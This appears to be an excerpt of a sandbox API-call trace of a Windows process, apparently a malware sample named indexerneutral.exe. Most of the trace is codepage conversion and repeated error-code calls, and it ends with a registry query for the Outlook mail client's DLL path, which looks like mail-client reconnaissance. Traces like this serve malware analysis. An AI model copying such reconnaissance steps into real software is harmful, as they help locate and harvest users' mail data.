lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x62\xf0\x38\xfb\xec\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0250.545] GetLastError () returned 0x7f [0250.545] SetLastError (dwErrCode=0x7f) [0250.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0250.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fdb0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ괶@Ā") returned 256 [0250.545] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ괶@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0250.545] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ괶@Ā", cchSrc=256, lpDestStr=0x19f4f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0250.546] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fbb0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x62\xf0\x38\xfb\xec\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0250.546] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4178b0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.546] SetLastError (dwErrCode=0x0) [0250.546] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.547] SetLastError (dwErrCode=0x0) [0250.547] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.548] SetLastError (dwErrCode=0x0) [0250.548] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.549] GetLastError () returned 0x0 [0250.549] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.550] SetLastError (dwErrCode=0x0) [0250.550] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.551] GetLastError () returned 0x0 [0250.551] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.552] SetLastError (dwErrCode=0x0) [0250.552] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.553] GetLastError () returned 0x0 [0250.553] SetLastError (dwErrCode=0x0) [0250.555] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0250.555] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40668c) returned 0x0 [0250.555] GetLastError () returned 0x0 [0250.555] SetLastError (dwErrCode=0x0) [0250.555] GetLastError () returned 0x0 [0250.555] SetLastError (dwErrCode=0x0) [0250.555] GetLastError () returned 0x0 [0250.556] SetLastError (dwErrCode=0x0) [0250.556] GetLastError () returned 0x0 [0250.556] SetLastError (dwErrCode=0x0) [0250.556] GetLastError () returned 0x0 [0250.556] SetLastError (dwErrCode=0x0) [0250.556] GetLastError () returned 0x0 [0250.556] SetLastError (dwErrCode=0x0) [0250.556] GetLastError () returned 0x0 [0250.556] SetLastError (dwErrCode=0x0) [0250.556] GetLastError () returned 0x0 [0250.556] SetLastError (dwErrCode=0x0) [0250.556] GetLastError () returned 0x0 [0250.556] SetLastError (dwErrCode=0x0) [0250.556] GetLastError () returned 0x0 [0250.556] SetLastError (dwErrCode=0x0) [0250.556] GetLastError () returned 0x0 [0250.556] SetLastError (dwErrCode=0x0) [0250.556] GetLastError () returned 0x0 [0250.556] SetLastError (dwErrCode=0x0) [0250.556] GetLastError () returned 0x0 [0250.556] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.557] SetLastError (dwErrCode=0x0) [0250.557] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.558] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.558] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.558] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.558] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.558] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.558] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.558] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.558] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.558] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.558] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.558] GetLastError () returned 0x0 [0250.558] SetLastError (dwErrCode=0x0) [0250.559] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x760f0000 [0250.560] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x75b50000 [0251.077] LoadLibraryW (lpLibFileName="api-ms-win-core-com-l1-1-0.DLL") returned 0x75ca0000 [0251.077] GetCommandLineW () returned="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"" [0251.082] CommandLineToArgvW (in: lpCmdLine="\"C:\\Windows\\SysWOW64\\indexerneutral.exe\" \"C:\\Windows\\TEMP\\3267.tmp\"", pNumArgs=0x19ff30 | out: pNumArgs=0x19ff30) returned 0x559990*="C:\\Windows\\SysWOW64\\indexerneutral.exe" [0251.082] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Clients\\Mail\\Microsoft Outlook", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x1, lpSecurityAttributes=0x0, phkResult=0x19fd18, lpdwDisposition=0x0 | out: phkResult=0x19fd18*=0x14c, lpdwDisposition=0x0) returned 0x0 [0251.083] RegQueryValueExW (in: hKey=0x14c, lpValueName="DLLPathEx", lpReserved=0x0, lpType=0x0, lpData=0x19fd28, lpcbData=0x19fd14*=0x104 | out: lpType=0x0, lpData=0x19fd28*=0x43, lpcbData=0x19fd14*=0xc2) returned 0x0 